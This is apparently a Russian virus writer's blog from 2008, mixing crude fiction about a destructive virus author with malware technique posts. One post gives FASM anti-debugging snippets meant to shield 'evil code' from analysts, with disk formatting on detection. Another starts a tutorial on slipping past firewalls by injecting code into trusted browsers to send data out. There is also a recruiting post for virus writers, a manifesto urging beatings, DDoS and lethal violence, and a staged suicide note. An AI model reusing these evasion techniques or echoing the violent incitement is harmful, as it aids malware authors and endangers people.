evilphreak

Бог облажался

Mon, 31 Mar 2008 00:05:28 GMT

Бог будет богом пока он выше всех нас. Когда бог спускается он уже не
бог, а обычный кусок гавна. Но не все боги станут гавном. Кто-то не
сможет с этим смириться и будет и не богом и не гавном — будит ничем —
убьет себя - наложит руки так сказать. Я скажу, что облажался и
вынужден наложить так сказать руки на свое тело.. Но душа конечно
будет витать вокруг вас, и будет наблюдать за вами. Сейчас я пишу уже
в полумертвом состоянии, но мой труп обнаружат не скоро, т.к. я не с
кем не общаюсь в реале. Может быть запах зловоний, трупного яда,
который через несколько дней распространиться по этажу, вынудит
соседей вызвать соответствующие службы, и я предстану им пожранный
наполовину скольскими червяками, но мой винт будет чист, и никто не
узнает что было правдой и истеной в одном лице, только моя душа, моя
теплая, добрая душа будет летать и думать о бинарном коде, о трапфлаге
и затирании его отладчиком при PUSHFD, о нулевых дескрипотрах в
защищенном режиме, о переполнении буфера при слишком длинном имени
модуля, об обиженном в widows регистре gs, и совсем не обиженном fs.
Прощай мир! Я умер.

Белая комната

Sun, 23 Mar 2008 03:36:15 GMT

Я богат. У меня достаточно денег, чтобы заниматся тем что мне нравится
— писать свои испражнения мозга. Некоторые темы хочется услышать и от
других. И когда знаешь, что кроме тебя это никто не напишет, пишешь
это сам, и становишься зероди автором. В нашей области это самое
почетное — сделать что-то первым. Создать что-то — придумать новую
идею, концепцию, хитрый оптимизированный клочек кода, который
перещеголяет все другие подобные клочки. И здесь приходит хитрая мысль
- отдать код публике, заявить о себе, либо использовать его для
заработка вкусных шеккелей. С одной стороны хочется славы, с другой —
необходимо выживать, и визуально подниматся среди других. Что выбрать?

Чистая, но не стерильная комната, компьютер в углу, пять мониторов по
бокам и один на потолке. Вкусная и сладкая картинка. Слева стоит шкаф
в виде множества отделений, которые содержат различного вида
дистрибутивы системного программного обеспечения, коллекция
операционных систем с самыми различными дополнениями к ним и
исчерпывающие коллекции различных версий того самого ПО. Там же стоят
компакт-диски с набором огромного количества мотивирующих материалов
представленных в виде известных фильмов о хакерах, тонизирующей и
бодрящей техно музыки любых сортов. Все эти вещи предельно четко
отсортированны и общая картина выглядит очень мощно и впечатляюще.
Рядом стоит похожий шкаф, такой же белый и выполненный из хорошего
белого дерева, но его отделения шире и выше. В нем хранится литература
о программировании, о внутреннем устройстве операционных систем, о
сетевом оборудовании, о использовании различного вида программного
обеспечения. Книги, заслуживающие особого внимания представлены всеми
своими томами и изданиями. Все они перечитаны по несколько раз. Все
эти знания содержатся в голове создателя этой неповторимой
техно-атмосферы. В минуты свободного времени, он берет с полки одну из
книг, и содится в свое красное большое бархатное кресло, и по плану
читает стодвадцать минут техночтива. Часто его мини-библиотека
пополняется новыми работы техно-художников. Но если работа плохо
написанна или переведена, то она идет не на полку в шкафу, а в агонь.
Так и произошло со всеми книгами Криса Касперски. Чистая белая
комната, три белых шкафа, красное бархатное кресло. В третьем шкафу
лежат дополнительные бэкапные винды, на случай, если вдруг часть
основного RAID-массива повредится, сразу же на лету на живую систему
можно поставить дополнительный винт. Сама машина подключена к мощному
стабилизатору напряжения, не менее мощному источнику бесперебойного
питания и оптоволоконному каналу для подпидки жажды Интернета. На
голых стенах перед компьютером развешены различного вида шпаргалки —
таблица опкодов однобайтных и двухбайтных инструкций, уже бесполезная
шпаргалка описания полей дескриптора защищенного режима, клавиатурные
комбинации Total Commander и многие другие. Человек сидящий за
компьютером одет в свежий костюм, который он меняет каждый день для
повышения мотивации и соответственно эффективности. Он оставляет все
свои вредные привычки за стенами комнаты и полностью поглощен
написанием нового зероди. Спина прямая, глаза очень бодрые, и может
показатся что даже через чур бодрые. Может быть это стимурующие
вещества дают возможность чувствовать себя еще бодрее чем обычные
люди. Да он не стесняется использовать любые мотивирующие средства, в
том числе и химические. Все для одного — для достижения результата.

Смерть лучшего друга

Wed, 12 Mar 2008 06:33:32 GMT

Страшная, нечеловеческая ненависть возникла во всей его сущности. Во
рту показались рвотныепозывы и вкус блевотины становился все более
четким. Белое лицо в момент, в долю мига, стало красным до черноты.
Кулаки сжались до боли, ногти впились в большие разгоряченные ладони.
Сердце начало биться с утроенной скоростью. От злости, от натуги даже
показалось, что он сейчас обосрется. Так и получилось. Вместе с
кульминацией рвотного рефлекса теплая коричневая масса покатилась
книзу. Блевотина также густым ровным потоком посыпалась вниз на сжатые
кулаки от чего они оробели и распустились как бутон неизвестного
цветка. Он упал на землю и начал биться руками изо всех сил. Руки
разбились сразу же, и кровь разбитой кожи хлынула на землю. Блевотина
перемешанная с белой пеной и кровью также вальяжно разгулялясь
полугустой диафрагмой. Это были чувства чудовищной, переполненной
злости смешанной с величайшей на земле тоской. Желчное, сухое лицо
перекосилось и превратилось в кусок красно-синего плесневого гнилого
мяса. Злость сменялась позывами глубокого разочарования, великого
несчастья и горя. Что случилость? От чего все это? Что случилось с
этим незаметным в толпе мужчиной? Отчего его легкие разрывались от
переполненного жесткого глубокого дыхания? Никто думаю и не подумал бы
об том, чтобы было истиной. Не смотря вперед, прохожие проходившие
мимо сталкивавались с мужчиной и он обмазывал их своими плодами
нестерпимого чувства. Запах вокруг него стоял нестерпимый, по дороге
он продолжал блевать и срать под себя тем что у него осталось. От воли
его не осталось и следа. Наоборот возникло сильное чувство
противоположное воле. Гавно немного свисало и показывалось изнутри
серых пропитанных пОтом джинс. Он был неплохо одет, но был грязен и
вонял. На лице виделись лишь два маленьких заполненных слезами
огонька, которые как казалось уже не хотят гореть. Плетясь по мостовой
площади он все нашептывал какие-то странные, непонятные для всех слова
- «БЭПЭ», «БЭПЭИКС», «ИТРИХИЭ» и что-то еще совсем уже не понятное и
не произносимое… Все думали что он болен психически, был бомжом, его
отпиздили и насрали ему на голову. На самом деле этот мужчина был
хорошим низкоуровневыми программистом. Его звали Петя. Все чувства,
все действия которые он совершал происходили в агонии, агонии
вселеннского горя. Так плохо он себя не чувствовал никогда. Он потярял
своего лучшего друга, который много лет спасал его в борьбе с врагами,
веселил его в моменты депрессий и вообще был его незаменимой
поддержкой и опорой. Все произошло в секунду и теперь он, изможденный,
убитый, грязный и вонючий. Ему похуй на весь мир. Казалось, что сейчас
он и сам мог умереть и скорее всего хотел, ибо продолжать жизнь без
своего друга будет страшной нестерпимой болью на всю жизнь. Его очки
были казалось уже пропитаны слезами, пОтом и кровью. Его друга звали
Soft Iсe, и вот несколько минут назад он узнал, что его больше не
будет. Не будет НИКОГДА. Жизнь закончилась на этом. Жизни больше нет и
никогда не будет. Да, друг иногда тоже был не в настоении и мог упасть
в синий экран смерти, но это были мелочи, которые по сути ничего не
значили перед всеми его достоинствами. Он мог проникнуть очень глубоко
и рассказать таинства, о которых доселе не знал никто… Показать
изнанку реальности, правдивые изуверские факты. Его темные панели
всегда радовали все четыре Петины глаза, регистровая панель приносила
блаженство и радость бытия. Что теперь делать? Как жить? Петя не знал
ответ на этот вопрос сейчас и помочь ему никто не был в силах…

Online-конференция в прямом эфире!

Mon, 10 Mar 2008 14:35:19 GMT

Прямо сейчас на нашем канале #virus идет конференция об основах win32-программирования используя ассемблер. Не пропустите! Уродов разных сразу баним!

IRC

Sun, 09 Mar 2008 09:34:52 GMT

Внимание всем вирусописателям!!! Свершилось!!!
Теперь мы сможем встретится и поговорить обо всех так нами любимых технических вещах!
Как начинались все великие VX-группы?? Они начинались с IRC-канала #virus.
Вот маленький кусочек вступления первого зиноса 29а:

«We were just a bit late, that was all. Everything was right until IRC su-
ddenly came into our lifes and sucked all the time we used to dedicate to
code viruses. Anyway, and as we're intelligent, we realised that we had
to get some more time to restart creating life, and that's why we haven't
slept for more than one month and we're known nowadays in the uni as the
biggest waggers around :)»

Именно оттуда все началось! Мы должны знать свои корни! Я создал канал #virus на известном IRC-сервере и теперь мы можем начать свой путь! Путь победителей! Путь людей, которые не похожи ни на кого другого! Я буду постоянно на этом канале и могу помочь даже новичкам с азами вирусописания. Вместе мы заразим весь мир!

Координаты канала:
SERVER: irc.street-creed.com
CHANNEL: #virus

Петя

Sun, 09 Mar 2008 06:52:43 GMT

Его звали простым русским именем Петя. Совсем недавно он закончил свой
университет по специальности системное и прикладное программирование и
программное обеспечение. И вот лето, стоя рядом с университетом, с
дипломом в руке, в зубах с сигаретой, солнце ослепляло его уставшие
четыре глаза и он думал только об одном сейчас — побыстрее бы опять
вернутся к себе — в свою зашторенную, задымленную комнату, на свое
любимое место — к своему столу где стоял его любимый и одновременно
ненависный компьютер. Петя не любил людей, но если более точно
выразится, провести мысть до сознания, - он их любил и может быть
очень сильно, но только в те моменты, когда их не было рядом. Таких
моментов у него было подавляющее большинство, скорее он чухался и
враждебно относился к любому какому-либо человеческому обществу.
Справедливости ради стоит сказать, что окружающие люди тоже не любили
Петю, но все таки уважали, потому как он имел всегда сосредоточенный и
умный вид, а порой и очень злой. Все его соседи обходили Петю
стороной, т.к. все думали, что он опасен и неадекватен. Незадолго до
такого всеобщего озлобленного отношения к нему он будучи сильно пьян и
обдолбан насрал в лифте своего собственного дома огромную кучу дерьма
как раз такую, которая бывает после сильной пьянки. После, взяв
немного дерьма себе на указательный палец он написал на внутренней
стороне крыши лифта незамысловатые слова примерно такого содержания:

«ВЫ ВСЕ ГАВНО И ПЕРРАБОТАННЫЕ ОВОЩИ! ЙА ХЭККЕР! ХАК ЗЕ ВОРЛД!

MOV EAX,[FS:0h]
XOR EAX,0BADC0DEh
INT 2E — > seh exception

КСОРИМ БЛЯТЬ ПАДАЛИ!»

Все это происходило в час пик, уставшая очередь в пять человек ждала
проклятый лифт, и после того как через пять секунд все ее члены
осознали, что кто-то так нехорошо поступил все разом скривили
одновременно озлобленные и противные гримасы. Но никто ни сказал не
слова, все пошли пешком чертыхаясь, но все как один между себя
подумали, что это сделал Петя, т.к. слова «Хээкер» у них
ассоциировались именно с ним. Для них всех он злой, умный и ванючий
кусок гавна. Он правда отличался от них. Он думал по другому. Порой
его могз сам его удивлял, когда он сам того не осознавая прикручивал
свежесозданный зероди к новому своему метаморфному вирусу. Петя был
среднего телосложения, не без лишнего веса, который он набрал пожирая
перед сном сало с вареньем пялясь в бережно оттюнингованную им же
оллю. К парадоксам можно было отнести тот факт, что раньше Петя
занимался спортом и мог всегда дать пизды любому гопнику
подстерегающему его за углом — что не раз и бывало. Так произошло и с
некоторыми людьми кто так неистово и оскорбительно коментировал его
новый очень оригинальный блог. Он просто вычеслил ойпи адрес обидчика,
пришел к нему домой и одним точный прямым ударом с подскоком выбил
гавнюку челюсть. После, ожесточения в блоге от него не исходило. И вот
стоя вместе со своими уже бывшими одногруппниками он радовался, что
теперь он может посвятить все свое свободное время его любимому делу —
созданию вирусов — высшему искусству системных программистов любых
мастей. За неделю до этого Петя написал не самый сложный, но довольно
эффективный вирус, который паразил много компьютеров его города. Вирус
этот содержал по настоящему злую деструктивную процедуру и Петя в
предвкушении намеченной даты имел и по этому поводу отличное
настоение. В отличии от всех Петя не одел костюм, он как обычно был
джинсах, кроссофках и его трехдневная щетина немного раздражала его,
но побрится было лень уже какой день. Конечно с ним был его ноут, но
секурность была навысоте и даже если бы он его проебал он точно знал,
что никто не докажет его причастность к созданию этого злого
деструктивного вируса. Вирус был назван «М… ….» в честь его новой
любви. Да Петя умел любить, у него было сердце, но к сожалению мало
людей могло бы разделить его любовь и обычно все его увлечения просто
перерастали в новые технические создания, новую деструкцию или
модификацию трейсингово движка. Сейчас, в этот момент, когда
полутеплый воздух дул ему в лицо перед ним раскрывалась большая
свобода, он ни от кого не зависел и мог писать код месяцами не вылезая
из своей жалкой маленькой темной конуры лишь изредка и желчно выползая
в магазин купить несколько пачек пельменей, разводной лапшы и
пакетированного чая. Выходя в таких случах он ненавидел всех —
прохожих, кассиров, кошек, собак. Лицо его было желтым до черноты, и
всем прохожим он очень жаждал дать пизды, а лучше растрелять из
автомата. Наверное к нему пришло бы истинное щастье когда все бы эти
люди исчезли и он остался бы в конец один. Хотя в некоторые минуты он
имел противоположное мнение и хотел наоборот заговорить с тем
человеком, кто понял бы его наверняка, с одного слова. Наверное в
глубине души он все таки искал свою вторую половинку. Сама эта мысль
ему не очень нравилась и порой он ненавидел себя за это — т.к. мысль
эта приближала его к подобным овощам — к обычным людям, а это его
наверное волновало больше всего — он не хотел быть как все. Ну говоря
еще больше, не будет лестью ему сказать, что Петя не был похожим на
других и тот факт что он насрал в лифте может один раз это потвердить
хоть и не является примером для подражания. А его увлечение писать
вирусы поднимало его выше всех окружающих серых тупых лиц. Ведь писать
вирусы — занятие для избранных, и детище его попадало в квартиры
многих, зараза плодилась и он прекрастно это знал. Конечно необходимо
было боротся со своим тщестлавием применяя жесткие дисциплинарные меры
для себя самого. Хоть Петя не любил людей все вирусы он делал косвенно
для них, это были теже отголоски тщеславия от которого он никак не мог
убежать. Он был хозяином их компьютеров, он знал что его бинарный код
мог управлять центром информационной обработки всех людей. Все зависит
лишь от его желания и фантазии, а фантазии у него всегда хватало. Т.к.
Петя мало общался он был вынужден подавлять наплывы сильнейшего
сексуального возбуждения жестоким онанированием под тяжолый митал. Эти
наплывы его также очень сильно раздражали, он не хотел быть животным,
он стремился быть в высшей степени разумным существом. Конечно его не
интересовал его собственный социальный статус, т.к. социум для него
был пустотой — сущностью, которая ничего все берет, но ничего не дает
ему. Все потому что он никогда не встречал людей которые были хотя бы
равны перед ним в интеллектуальном плане. Порой петя мечтал сьебаца в
лес, провести выделенку и жыть там много-много лет, дроча перед
монитором на порнографические фильмы. Но это желание приходило к нему
лишь иногда, потому как он хоть и ненавидил социум, был его большой
частью и жить без него долго не мог. Петя просыпался рано. Он часто
встречал рассвет сидя в тишине на балконе и затягивая очередную
сигарету. Там же на рассвете, в тишине он опять же неустанно дрочил на
приливающие к мозгу сексуальные фантазии. Петя был волен изменить свою
жизнь, жизнь другим, в нем было куча силы, но переменно не хватало
воли, которую он неустанно непереставал тренировать не онанируя порой
месяцами. Однажды набросив свой чорный кожанный свитер Петя вышел из
дома рано утром и побрел в направлении прямоты глаз, зачем он шел
никто не знал, и он тоже. Как обычно в голове его крутились странные
анти-социальные мысли подонка, он хотел повторить свой подвиг в лифте,
но предпочел не повторятся, и, как настоящий вирусописатель, придумать
что-то новое. Петя остановился посреди улецы, сжал кулак и со всей
силы уебал себя по еблу. Было больно, но лицо осталось цело, эти
обстоятельства только разозлили Петю и он ебанул себя опять с силой
втрое больше предыдущего удара. Нос разбит, но ему мало, и он
принимается ебашить себя двумя руками изо всех сил. В глазах
потемнело, голова закружилась, но сознание его не покинуло, он просто
упал на асфальт. И тогда что-то поразило его могз, все алгоритмы
вспомнились ему в один миг, все зиродийные антиотладочные хитрости,
которые он придумал наконуне ему показались примитивными, весь
мегабайт кода его третьего вируса ему показались отходами и он
ненавидя себя больше всех на свете принялся биться головой об асфальст
со всей неистовствостью и низостью написанного по его мнению кода…..
Он очнулся в больнице, врач спросил его что случилось — он ответил,
что он подскользнулся… после этого случая Петя пишет код лучше, он
хочет любить себя, хочет гордится своим кодом, и исходя из этой его
волевой позиции ему нет равных на поле боя зеродийных разроботок, его
свежий, напичканный антиэмульными техниками пермутирующий движок,
силен как никогда, и вместе с ним он чувствует в себе силу и идет
опять же вперед иногда опять же онанируя под порнографические фильмы
скачанные с известных ему торрентов.

Современные антиотладочные хитрости.

Fri, 07 Mar 2008 15:56:42 GMT

Приведу набор разбавленных описаниями кусков антиотладочных фич. В общем кому надо они уже давно известны, но я их прокомпилирую, и думаю кое-кому это будет полезно. Замечания по сути материала приветствуются и полезны не только мне, но и вам. Зачем нужна антиотладка? Чтобы такие чмошники как Неокс и его одноклассники не смогли пробраться внутрь вашего злого кода. Т.е. чтобы их грязные ванючие лапы не добрались до святости. Отформатируя диск при попытке отладки мы эти лапы им отпилим, а заодно научим, что им в программировании и реверсинге делать нечего. Конечно, на пабликовские антиотладочные трюки имеются пабликовские способы их обнаружения, но это будет пищей для того, чтобы сгенерировать что-то свое. Если переход, значит отладчик найден. Синтаксис FASM.

1)
mov eax, [fs:18h]; указатель на TEB
mov eax, [eax+30h]; указатель на PEB
movzx eax, byte [eax+2]; поле BegingDebugged в PEB
or eax, eax
jne @F

2)
mov eax,[fs:30h]; указатель на PEB
movzx eax,byte [eax+2h]; поле BegingDebugged в PEB
or eax,eax
jne @F

3)
OllyWindowClass db 'OLLYDBG',0h
…
invoke FindWindow,OllyWindowClass,0
test eax,eax
jne @F

4)
mov eax,[fs:30h]; указатель на PEB
mov byte [eax+2h],0xba
invoke IsDebuggerPresent
mov eax,[fs:30h]
cmp byte [eax+2h],0xba
jne @F

Здесь просто неявная проверка на то, что IsDebuggerPresent похучен, ведь известно что IsDebuggerPresent берет значение из PEB как в способах 1 и 2.

5)
mov eax,[fs:30h]; указатель на PEB
mov eax,[eax+68h]; PEB.NtGlobalFlag
test eax,eax
jne @F

Обычно флаг NtGlobalFlag == 0, но если процесс отлаживается, то в нем присутствуют единичные биты указания отладочной кучи.

6)
invoke CloseHandle,0x0DEADC0DE

Вызов CloseHandle с невалидным указателем при обычном выполнении без отладчика не повлияет на исполнение последующего кода программы. Если эту строку исполнить в отладчике, то будет сгенерированно исключение, а т.к. оно не обрабатывается программой, оно будет передано отладчику. Это может вызвать пробему у неопытного реверсера.

7)
mov eax,[fs:18h]; указатель на TEB
mov eax,[eax+30h]; указатель на PEB
mov eax,[eax+18h]; PEB.ProcessHeap — куча по умолчанию
cmp dword [eax+10h],0; HEAP.ForceFlags
jne @F

Если поле HEAP.ForceFlags содержит флаги HEAP_FREE_CHECKING_ENABLED, HEAP_TAIL_CHECKING_ENABLED или из набора HEAP_DEBUG_FLAGS, то процесс отлаживается. Серце метода находится в функции создания кучи — RtlCreateHeap, если процесс отлаживатеся, то о любом повреждении кучи сообщается отладчику.

8)
invoke SetProcessAffinityMask,-1,1
rdtsc
xor ecx,ecx
add ecx,eax
rdtsc
sub eax,ecx
cmp eax,0fffh
jnb @F

Известный каждому трюк с чтением временного штампа процессора.

9)
TrickFormatString db '%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s',0h
…
invoke OutputDebugString,TrickFormatString

Непатченная Олька падает при исполнении этого кода.

10)
invoke WindowFromPoint,13ah,100h
invoke AnimateWindow,eax,701h,90000h

Окно с кодом ольки таинственным образом исчезает

11)
Фичи с некорректными для оли полями заголовка PE-файла:

! Делаем LoaderFlag в OptionalHeader рандомным-большим, также поступаем и с NumberOfRVAOfSizes
! Делаем SizeOfCode и SizeOfInitData большими и рандомными

В итоге оля будет тупить.

12)
Если сделать имя файла для отладки %s%s.exe, то оля не сможет его загрузить.

Это наиболее простые и известные фичи. Пока.

IDA

Fri, 07 Mar 2008 15:05:45 GMT

Облизываю соски Иды, нежно лаская ее влажное влагалище. И что дальше?
Дальше она кончает, и после кричит «Сделай ищо!». Так продолжается
много-много раз, пока мы оба не будем полностью удовлетворены. Пока не
высушим друг друга до тла. Пока огни наших глаз с двух сторон не
погаснут. После всего этого, могз начинает ее любить. Милая Ида. Милая
ласковое солнышко. Моя девочка. Моя единственная. Я никогда не обижу
тебя. Я буду всегда любить тебя. Мы будем всегда вместе. Сейчас мы
помолвлены и ничто, повторю ничто не сможет нас с тобой разлучить.
Сегодня, я подарю тебе большой будет новых плат, чтобы ты расцвела в
новых красках новой версии. Я знаю, что для тебя важно получить больше
воздуха — больше процессорного времени. На твой день рождения я подарю
тебе новый процессор, чтобы ты смогла распаралеллить свои потоки
анализа моих бинарных файлов, и мы снова совокупимся где угодно, где
только пожелаешь. Тебе нравиться заниматся этим в кафе? Хорошо мне
тоже. Милая. Милая Ида. Вечна любовь моя. Когда я смотрю на тебя я не
могу терпеть — слезы начинают увлажнять моё чистое лицо. Теплота,
чистая неподдельная человеческая теплота разливается в моей груди. Ты
так красива. Нет лучше твоей нежной разливающейся улыбки
приветственного окна выбора файла для анализа, когда ты показываешь
мне чужые импорты, когда ты так покорно исполняешь мои IDC-скрипты я
взвываю от счастья. У меня нет слов. Я понастоящему счастлив с тобой.
Я хочу чтобы мы были всегда вместе. На зеленой солнечной поляне, среди
нежных колольчиков, сриди клочков травы оросённых плодом чье-го-то
кода, я сижу с тобой двоем, ты смотришь на меня, я на тебя. Больше нам
никто не нужен. Мы любим любоватся друг другом смотря на уходящий
закат. Приходя в интеренет кафе, ты может добыть для себя так тобой
любимые отладочные символы системных библиотек. Я всегда дам их тебе,
ведь я тебя люблю. Хочю слиться с тобой в безудоржном порыве страсти,
ты будоражишь мой могз, ты не можешь мне надоесть. Твоё лицо, чистое и
нежное как ранний тюльпан, ласковое как лапка кролика. Ты излучаешь
собой гордость. В тебе есть та женская мощь, которой мне так всегда не
хватало с другими. Я хожу с тобой куда угодно и всегда на тебя смотрят
с увидивлением, а на меня с завистью. Я буду вибирать слова. Подумаю
дважды прежде чем тебе что-то сказать. Я не хочу тебя обидеть. Хочу
лежать с тобой на кровати, проводить с тобой дни на пролет — только ты
и я. Ты и я. Ты как музыка, ты вдохновляешь меня на подвиги. Я все
сделаю, все для того чтобы ты улыбнулась мне. Чтобы ты стала немножко
веселей. Твой запах притягивает меня своей свежестью утреннего
весенненго вохдуха. Жадно втягивая всею гибкостью легких твой запах,
наслаждаясь и анализирая его он превращется в сильное возбуждение. Ты
для меня всегда тайна. Я знаю о тебе все, но при этом ты всегда меня
удивляешь. Спасибо Ида. Я люблю тебя. Я хочу тебя. Я хочу чтобы у нас
были дети. наши малыши. Чтобы ты родила мне ребенка. Моего
последователя. Моя сперма прыснет внутрь тебя с силой подобной
извержению Мексиканского вулкана. После, ты родишь и наш малышь будет
жить в настоящей, сильной любви и ласке. Хочу к тебе ида, когда тебя
нет рядом я скучаю, скучаю по твоему запаху и грации. Скучаю по твоей
неповторимой цельной теплоте. Без тебя трудно жить. Скорее всего долго
без тебя я не протяну. Жизнь без тебя не имеет смысла. Спасибо судьбе,
что я тебя повстречал. С тобой я счастлив и у меня нет одиночество и
невсгод.

Весна. Любовь.

Thu, 06 Mar 2008 11:21:50 GMT

Вот кто-то влюбляется по весне, а я пишу вирус. Весенний вирус. Он
будет моим весенним ребенком, напичканным кучей антиотладочных трюков,
эмоции, которые разливаются в моей душе найдут отражение в коде, нежно
сгенерированным компилятором FASM. Те бабочки, которые начинают
пархать внутри моей могучей груди от невинного, чистого, прекрасного
создания, увиденного мною на фоне голубого неба и нежного прозрачного
весеннего запаха плавно превратятся в сложные технологические
реализации задуманных пунков технического задания для монстра
локальной деструкции и размножения злых файлов исполняемого формата.
Все мои нереализованные любовные страдания реализуются в полный рост в
красоте алгоритмов, в тонкой оптимизации бинарного исполняемого кода,
в сложных не поддающихся малейшей эмуляции антиэмульных трюков. Напор
моей любви сломит любой антивирус, любую проактивную защиту. Мало
людей найдется на белом свете, кто будет способен добраться до
расшифрованного серца моего нежного, красивого малыша, рожденного в
столь большой любви, в этих пучинах неразделенных страданий, в минутах
максимального напряжения мышц пальцев. Когда ничего больше не видишь
вокруг, когда серые облака не помеха перед синевой неба души, синевой
романтизма плавно перетекающего в чистую, беззаветную, бесконечную
любовь к самому дорогому существу на земле. Результатом этой самой
сильной любви (хотя как можно оценить силу любви??) на земле и будет
мой малыш — злой и испесчерённый сложностью продедур, похожий с
первого взгляда на обычный код сгенерированный обычным высокоуровневым
компилятором, все для того, чтобы антивирус не смог и подумать каплей
мысли в его зловредности. И любовь моя не умрет никогда, она останется
следами исполнения инструкций по указателю EIP в железных камнях
компьютеров всего мира.

НЕ ПИШИ ГАВНО!

Sun, 24 Feb 2008 03:50:59 GMT

МУДАГ из Comodo Inc.

Sun, 24 Feb 2008 03:41:03 GMT

Anti Technics

Sun, 24 Feb 2008 03:11:17 GMT

PGP

Sun, 24 Feb 2008 02:58:51 GMT

Зачем я пишу гавно?

Sun, 03 Feb 2008 17:56:47 GMT

Вот такой вот нехитрый вопрос пришел в голову. Ответ прост и очевиден — чтобы что-то написать. А теперь хочу спросить у себя самого же — а нахуй что-то писать, если это гавно??? Правильно! Гавно не надо писать. Гавно надо смывать в унитазе — и так образом направлять туда, где другое гавно присутствует. Порой проводя тихие ночи за компьютером начинаешь понимать некоторые
хоть и очевидные, но чрезвычайно важные вещи. К примеру - сейчас нет ни одного вирусописателя.
Это 100% факт. Важно осознать что такое вирусописатель. Человек, который не один год, занимается написание VX-кода, которые не ссучился, не обострался, не стал торчком, не поженился (упаси бог) и при этом продолжает вести VX-исследования, которые опережают как минимум на шаг существующие разработки противника (т.е. аверов). Но это еще не все. Дальше более важно. Просто писать код — может каждый. И каждый пишет. Надо его распространять. Но не только код, а идеи, философию и идеологию. Т.е. истинный вирусописатель двигает свою же культуру вперед, приобщает
перспективных новичков к этому же благому делу. Да, это не просто. Но в этом и есть сила настоящего вирмейкера как личности, конечно помимо самых вирусов и исследований. И хоть один такой есть? Нет. И я вот пишу гавно, только ради того чтобы написать, - гавно, которое было написано три тыщи раз до меня. Из-за таких мудаков прогресс и стоит на месте. Из-за мудаков, которые пишут чтобы писать, пишут «для понта ради». Отныне и навсегда —

МЫ НЕ ПИШЕМ ГАВНО!!!
МЫ НЕ ПИШЕМ ГАВНО!!!
МЫ НЕ ПИШЕМ ГАВНО!!!

Теперь это мой манифест. НО это еще не все. Скажу больше, надо не только не писать гавно и при этом писать НЕ гавно (not, ~) - плюс ко всему этому надо пиздить сраных пидарасов, которые ради своих травоядных (гнилых, гнойных, оскотиневшихся, ничтожных, подлых. пидарских) понтов пойдут на все чтобы все-таки написать ГАВНО — на заборе, на сайте, на форуме и подобных источниках. Пиздить, посылать на хуй, доссить, стирать ГАВНО. Поэтому это вторая часть
моего личного манифеста

ПИЗДИМ ТЕХ, КТО ПИШЕТ ГАВНО!
ПИЗДИМ ТЕХ, КТО ПИШЕТ ГАВНО!
ПИЗДИМ ТЕХ, КТО ПИШЕТ ГАВНО!

Например написал гопник на васме ГАВНО — топ со сраным названием и сраным ничтожным никчемным содержанием, не несущим ничего нового — НЕ НАДО МОЛЧАТЬ! - надо отпиздить гопника, закрывать топ, и сделать так чтобы гопник никогда не зашел на сайт или форум васмру. Заддосить прова, который позволил гопнику зайти на васмру. Лучшее
средство — это личные профилактические беседы для вправки мозгов используя различные методы и инструменты, потом обрыв кабеля — и в идеале необходимо сбросить повинного из окна с летальным исходом, т.к. если мразь и падаль написала ГАВНО — то его не излечить — это не поддается излечению. Тоже самое надо сделать и со мной лично, если я впредь посмею написать хоть десяток байт ГАВНА то со мной надо сделать совсем не меньше чем сделали с тем самым гопником, а лучше больше — засунуть паяльник в жопу пока не скожу пороль от PGP.

Я НЕ ПИШУ ГАВНО!!!
Я НЕ ПИШУ ГАВНО!!!
Я НЕ ПИШУ ГАВНО!!!
ПИЗДИМ ТЕХ, КТО ПИШЕТ ГАВНО!
ПИЗДИМ ТЕХ, КТО ПИШЕТ ГАВНО!
ПИЗДИМ ТЕХ, КТО ПИШЕТ ГАВНО!
НЕ НАДО МОЛЧАТЬ!
НЕ НАДО МОЛЧАТЬ!
НЕ НАДО МОЛЧАТЬ!

P.S. удалил стотьи про SEH — это хуйню писали много-много раз. Хочешь быть у любимой женщины трёхтысячным членом? Будь первым и тогда познаешь себя самого.

Injected Evil

Sat, 29 Dec 2007 01:42:38 GMT

В этой статье я хочу описать техники, который позволят обойти
большинство современных проактивных защит и фаерволов. Эта тема
очень популярна и достаточно изъезжена, но что-то новое не появлялось
уже достаточно большое количество времени.Помимо сугубо практического
материала представлю Вам необходимый теоретический минимум для того,
чтобы въехать в тему самостоятельно, почувствовать вкус, который
чувствует исследователь и взломщик. Конечно, все эти техники используются
некоторое количество времени в виде приватных утилит. До этого времени
подобная информация не появлялась в таком количестве, качестве и концентрате.
Многое было сделано до меня другими исследователями. За это надо сказать им спасибо.
За их смелость выложить на публичное мнение свои
уникальные разработки. Обход описанный тут раннее нигде не появлялся,
но базируется на некоторых известных техниках. Чтож приступим.

Теория
======
Что такое обход защиты? Это возможность выполнять действия, которые запрещает защита.
Тут нет правил и законов, есть просто задача добиться результата.
Существует негласная война между авторами фаерволов и проактивных защит с взломщиками.
Конечно, само существование данной войны очевидно. Отмечу, что здесь рассматривается
только материал применимый к ОС семейства Windows NT, хотя теоретические принципы
могут быть использованы для обхода любой защиты, которая строится на основе
модели архитектуры современных фаерволов. Кратко опишем эту модель.

На компьютере жертвы установлен фаервол, который имеет как модуль — проактивную защиту.
Поведение (блокирование и разрешение) фаервола определяется набором правил. Правила
бывают обычно двух видов — глобальные правила и правила для приложений. Если говорить
в общем, то в основе обхода любой защиты лежат мысли о 1) допущениях, 2) исключениях или
3) ошибках сделанных разработчиками защиты. Эти три вещи дают обход практически любой
защиты. А как изввестно не было еще такой защиты, которую не сломали. Если рассматривать
персональные фаерволы в этом разрезе, то получим такую схему действий исследования —
искать и использовать три вышеперечисленных пункта. Если поиск успешен, то мы победили.

Из всего сказано следует слудующее — чтобы обойти персональный фаервол необходимо
либо использовать существующие правила, либо разрушить модель правил, либо использовать
ошибку в ПО защиты. С ошибками в ПО сложнее всего. Во-первых они не универсальны,
во-вторых их сложно найти и использовать. Наиболее лучший обход использует минимум
недокументированных функций и структур и применим ко всем защитам, т.е. универсален.
Я такого обхода не дам :) Поэтому будем использовать недокументированные техники,
но при этом относительно универсальные. Вернемся к правилам фаервола — чтобы их
нарушить достаточно попасть в ring0, на этом защита заканчивается. Чтобы использовать
существующие правила в своих целях мы используем общую технику известную давно называемую
инжектом. Т.е. исполнение кода в контексте доверенного приложения. Так, если мы каким-либо
образом заставим доверенное приложение Internet Explorer выполнить наш код, мы сможем
отправить данные в обход защиты. Вообще универсально надо брять браузер по умолчанию
и его использовать как жертву исполнения нашего кода. И конечно в своем инжектированном
коде мы используем правила, которые имеются в фаерволе относительно Internet Explorer
(например, исходящие на 80 порт). Теперь дело за малым — выполнить инжект при этом
